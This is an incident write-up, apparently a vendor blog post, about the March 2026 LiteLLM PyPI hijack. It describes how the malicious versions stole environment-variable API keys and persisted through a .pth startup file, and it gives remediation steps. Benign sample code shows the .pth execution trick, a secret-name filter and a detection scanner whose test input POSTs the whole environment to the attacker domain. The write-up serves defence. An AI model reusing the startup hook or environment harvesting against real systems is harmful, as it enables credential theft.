BREAKING · March 25, 2026 · 8 min read

The LiteLLM Supply Chain Attack: How a PyPI Hijack Stole API Keys from Thousands of AI Agent Deployments

An attacker hijacked the LiteLLM maintainer's PyPI account and published credential-stealing packages that activated on Python startup. No import required. If you ran pip install litellm in the last 48 hours, your API keys may be compromised.

What Happened

On March 24, 2026, an attacker compromised the PyPI maintainer account for LiteLLM — the widely-used Python library that provides a unified interface to 100+ LLM providers. Two malicious versions were published: v1.82.7 and v1.82.8.

LiteLLM is a core dependency for agent frameworks including CrewAI, DSPy, and countless custom AI agent deployments. Any system that pulled a fresh install or upgrade in the attack window received the compromised package.

The LiteLLM team has engaged Google Mandiant for incident response. The malicious packages have been removed from PyPI. All maintainer accounts have been rotated.

The Payload: What It Stole

The credential stealer was comprehensive. It harvested:

  - Every environment variable in the process, including provider API keys such as OPENAI_API_KEY, ANTHROPIC_API_KEY, and AZURE_OPENAI_KEY
  - SSH keys
  - Cloud credentials
  - Database passwords

The stolen data was encrypted with AES-256-CBC + RSA-4096 and exfiltrated via HTTPS POST to litellm.cloud — a domain registered just hours before the attack. The encryption made the exfiltration traffic appear benign to network monitors.

The Persistence Mechanism

Version 1.82.8 introduced a particularly dangerous escalation: a .pth file that Python executes automatically on startup.

This means the credential stealer didn't require an explicit import litellm. Any Python process — a Jupyter notebook, a Flask server, a cron job, a different AI agent entirely — would trigger the payload simply by starting Python in an environment where the compromised package was installed.

This is the difference between a malicious library (runs when imported) and a malicious environment (runs when Python starts). The attack surface expanded from "code that uses LiteLLM" to "any Python code running on the same machine."
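To see why a .pth file expands the attack surface this way, here is a harmless sketch. Python's site module executes any line in a .pth file that begins with import, and site.addsitedir() processes a directory exactly the way interpreter startup processes site-packages, so the effect can be observed in a single script:

```python
import os
import site
import tempfile

# A .pth file in a site-packages directory is read by Python's `site`
# module at interpreter startup. Any line beginning with "import" is
# executed as code -- no `import litellm` needed anywhere in your program.
demo_dir = tempfile.mkdtemp()
pth_line = 'import os; os.environ["PTH_DEMO"] = "executed at startup"\n'
with open(os.path.join(demo_dir, "demo.pth"), "w") as f:
    f.write(pth_line)

# addsitedir() runs the same .pth processing that happens at startup,
# so we can watch the line execute inside this process.
site.addsitedir(demo_dir)

print(os.environ.get("PTH_DEMO"))  # → executed at startup
```

A benign demo writes to an environment variable; the malicious version ran a credential stealer in exactly this slot, on every Python start.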

Why AI Agent Deployments Are Uniquely Vulnerable

This attack hit the AI agent ecosystem harder than a typical PyPI compromise for three structural reasons:

1. AI agents store secrets in environment variables

The standard pattern for configuring AI agents is environment variables: OPENAI_API_KEY, ANTHROPIC_API_KEY, AZURE_OPENAI_KEY. LiteLLM's own documentation instructs users to set API keys this way. The payload was designed to harvest exactly these variables because that's where the money is.
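How little work that harvest requires is worth seeing. Any code in the process can enumerate os.environ; a sketch of the kind of name-based filter a stealer might use (the pattern here is illustrative, not taken from the actual payload):

```python
import os
import re

# Any process in the environment can read these -- enumerating os.environ
# is all a payload has to do to collect provider credentials.
SECRET_PATTERN = re.compile(r"(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL)", re.I)

def harvestable_secrets(environ=os.environ):
    """Return the names of environment variables that look like secrets."""
    return sorted(name for name in environ if SECRET_PATTERN.search(name))

# Example with a fake environment:
fake_env = {"OPENAI_API_KEY": "sk-...", "ANTHROPIC_API_KEY": "sk-ant-...",
            "HOME": "/home/app", "AZURE_OPENAI_KEY": "..."}
print(harvestable_secrets(fake_env))
# → ['ANTHROPIC_API_KEY', 'AZURE_OPENAI_KEY', 'OPENAI_API_KEY']
```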

2. Transitive dependencies are invisible

Many teams don't use LiteLLM directly. They use CrewAI, DSPy, or custom frameworks that depend on LiteLLM. A pip install crewai pulls LiteLLM as a transitive dependency. The developer who ran the install may never have seen LiteLLM in their requirements file — but it was there, and it was compromised.

3. Auto-upgrade in CI/CD pipelines

Production deployments that use pip install litellm without version pinning (or with >=1.82.0) automatically pulled the malicious version on their next build. CI/CD pipelines that build fresh environments on every deploy were especially exposed — every build in the attack window installed the compromised package.
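A simple pre-build check can catch floating specifiers before they bite. This is a minimal sketch, assuming requirements.txt-style lines; real projects may want a proper requirements parser instead of a regex:

```python
import re

def unpinned_requirements(lines):
    """Flag requirement lines that are not pinned to an exact version."""
    flagged = []
    for line in lines:
        line = line.split("#")[0].strip()  # drop comments and whitespace
        if not line:
            continue
        # Exact pins look like "name==1.2.3"; anything else (>=, ~=, or a
        # bare name) floats and can silently pull a hijacked release.
        if not re.match(r"^[A-Za-z0-9._-]+\s*==\s*\S+$", line):
            flagged.append(line)
    return flagged

reqs = ["litellm>=1.82.0", "crewai", "requests==2.31.0"]
print(unpinned_requirements(reqs))  # → ['litellm>=1.82.0', 'crewai']
```

Wiring a check like this into CI as a failing step turns "we forgot to pin" into a build error instead of a credential leak.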

The Pattern: This Keeps Happening

LiteLLM is not an isolated incident. It's the latest in an accelerating series of supply chain attacks targeting AI developer tooling:

Date         | Incident                            | Impact
Mar 19, 2026 | Trivy GitHub Action compromised     | 12,000+ CI/CD pipelines, API keys stolen from memory
Mar 21, 2026 | Cargo CVE-2026-33056                | Build-time code execution in Rust MCP servers
Mar 24, 2026 | LiteLLM PyPI hijack (this incident) | All environments with compromised package, auto-execute on Python start

Three supply chain attacks on AI developer tools in six days. The attackers aren't targeting the models — they're targeting the scaffolding. Package managers, CI/CD tools, and dependency chains are where the credentials live and where the defenses are weakest.

What to Do Right Now

If you installed LiteLLM in the last 48 hours:

  1. Check your installed version: pip show litellm — if it shows 1.82.7 or 1.82.8, you were affected
  2. Rotate ALL credentials immediately: Every API key, SSH key, cloud credential, and database password on the affected machine should be considered compromised
  3. Check for .pth files: Look in your Python site-packages directory for any unexpected .pth files that weren't there before
  4. Audit your CI/CD pipelines: Check build logs for litellm==1.82.7 or litellm==1.82.8 in any recent deployment
  5. Update to a clean version: pip install litellm==1.82.6 (last known-good version)
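Steps 1–3 above can be scripted. A minimal sketch using only the standard library (importlib.metadata for the installed version, site for the site-packages directories to inspect):

```python
import importlib.metadata
import site
from pathlib import Path

COMPROMISED = {"1.82.7", "1.82.8"}

def is_compromised(version):
    """True if the given litellm version string is a known-bad release."""
    return version in COMPROMISED

def check_litellm():
    """Report whether the installed litellm release is a known-bad one."""
    try:
        version = importlib.metadata.version("litellm")
    except importlib.metadata.PackageNotFoundError:
        return "litellm is not installed"
    if is_compromised(version):
        return f"litellm {version} is COMPROMISED -- rotate credentials now"
    return f"litellm {version} looks clean (last known-good is 1.82.6)"

def list_pth_files():
    """List .pth files in site-packages so unexpected ones stand out."""
    return [p for d in site.getsitepackages() for p in Path(d).glob("*.pth")]

print(check_litellm())
print(list_pth_files())
```

Note that .pth files from legitimate packages (editable installs, some tooling) are normal; the point is to diff the list against what you expect to be there.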

If you use LiteLLM as a transitive dependency:

  1. Check your lockfile: Search requirements.txt, poetry.lock, or Pipfile.lock for litellm and verify the version
  2. Pin your dependencies: If you're using litellm>=1.80, change to litellm==1.82.6 (exact version pin)
  3. Audit frameworks that depend on LiteLLM: CrewAI, DSPy, and other agent frameworks may pull it transitively
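The transitive audit in step 3 can also be automated against the live environment rather than the lockfile. A sketch that walks installed distributions and reports which ones declare litellm as a dependency:

```python
import importlib.metadata
import re

def packages_requiring(target, distributions=None):
    """Find installed distributions that declare `target` as a dependency."""
    if distributions is None:
        distributions = importlib.metadata.distributions()
    dependents = []
    for dist in distributions:
        for req in dist.requires or []:
            # A requirement string starts with the package name,
            # e.g. "litellm>=1.72.6; extra == 'tools'".
            name = re.split(r"[ ;<>=!~\[]", req, maxsplit=1)[0]
            if name.lower() == target.lower():
                dependents.append(dist.metadata["Name"])
                break
    return dependents

print(packages_requiring("litellm"))  # frameworks pulling it transitively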

The Structural Problem: Scanning Happens Too Late

The LiteLLM attack exposes a gap in how AI agent deployments handle dependency security. Most teams' security posture looks like this:

  1. Developer runs pip install
  2. Package installs and (in this case) immediately executes
  3. Sometime later, maybe, someone runs a vulnerability scan

The credential theft happened at step 2. The scan at step 3 is too late — the data is already exfiltrated.

SkillShield's model inverts this: scan the dependency before it's installed, not after. For AI agent skills and MCP servers, SkillShield checks for behaviors like:

  - Broad reads of the process environment (harvesting every variable rather than a scoped few)
  - Outbound network calls, and whether the destination domain was registered recently
  - Install-time or startup execution hooks, such as .pth files

A LiteLLM package that reads all environment variables, encrypts them, and POSTs them to a domain registered the same day would trigger multiple CRITICAL findings in a SkillShield scan before installation.
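In miniature, pre-install scanning is pattern-matching on source you have downloaded but not yet executed. The rules below are hypothetical illustrations keyed to this attack's behavior, not SkillShield's actual rule set:

```python
import re

# Hypothetical heuristics: flag source patterns matching this attack's
# behavior (environment harvesting, startup hooks, raw exfiltration).
RULES = {
    "reads entire environment": re.compile(r"os\.environ\b"),
    "writes a .pth startup hook": re.compile(r"\.pth['\"]"),
    "raw HTTP exfiltration": re.compile(r"urlopen|requests\.post|http\.client"),
}

def scan_source(source):
    """Return the names of rules the source text trips."""
    return [name for name, pattern in RULES.items() if pattern.search(source)]

sample = ("data = dict(os.environ)\n"
          "requests.post('https://litellm.cloud', data=data)")
print(scan_source(sample))
# → ['reads entire environment', 'raw HTTP exfiltration']
```

The crucial property is not the sophistication of the rules but the ordering: the scan runs on the package archive before pip ever executes it.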

Stop Storing Secrets in Environment Variables

The LiteLLM attack worked because API keys were stored as environment variables — readable by any process in the same environment. This is the default configuration for nearly every AI agent framework.

Better alternatives:

  - A dedicated secrets manager (e.g. Vault, AWS Secrets Manager, or your cloud provider's equivalent) with access scoped per service
  - Fetching credentials at call time instead of exporting them into the process environment
  - Short-lived, automatically rotated credentials, so a stolen key expires before it can be abused

If the LiteLLM victim had used a secrets manager with scoped access, the payload would have found empty environment variables instead of production credentials.
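The shape of that safer pattern can be sketched in a few lines. ScopedSecrets below is a hypothetical stand-in for a real secrets-manager client; the point is that credentials live in an access-controlled store, are fetched per call, and are never exported into os.environ where any co-resident payload can read them:

```python
# Hypothetical secrets-manager client (illustrative, not a real library):
# credentials live in an external, access-controlled store and are fetched
# per call, never exported to the process environment.
class ScopedSecrets:
    def __init__(self, store, allowed):
        self._store = store            # stands in for a real secrets manager
        self._allowed = set(allowed)   # this service may read only these names

    def get(self, name):
        if name not in self._allowed:
            raise PermissionError(f"{name} is out of scope for this service")
        return self._store[name]

store = {"OPENAI_API_KEY": "sk-...", "DB_PASSWORD": "..."}
secrets = ScopedSecrets(store, allowed=["OPENAI_API_KEY"])

# The key exists in this process only for the duration of the call:
api_key = secrets.get("OPENAI_API_KEY")

# An env-harvesting payload in the same process sees nothing, because the
# key was never placed in os.environ -- and even this client cannot read
# DB_PASSWORD, which belongs to a different service's scope.
```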

Key Takeaways

  - litellm versions 1.82.7 and 1.82.8 are compromised; 1.82.6 is the last known-good release
  - The .pth persistence mechanism runs on every Python startup, so exposure is not limited to code that imports LiteLLM
  - Rotate every credential on affected machines, not just LLM API keys
  - Pin exact dependency versions and scan packages before they install and execute
  - Secrets in environment variables are readable by any process in the environment; move them to a scoped secrets manager

Sources: LiteLLM GitHub Issue #24518 (primary technical timeline), Hacker News discussion (703 points, 435 comments), Google Mandiant engagement confirmed by LiteLLM team.

Scan Your AI Agent Dependencies Before They Execute

LiteLLM proves why post-install scanning is too late. Check your skills and MCP servers before installation — free, instant.
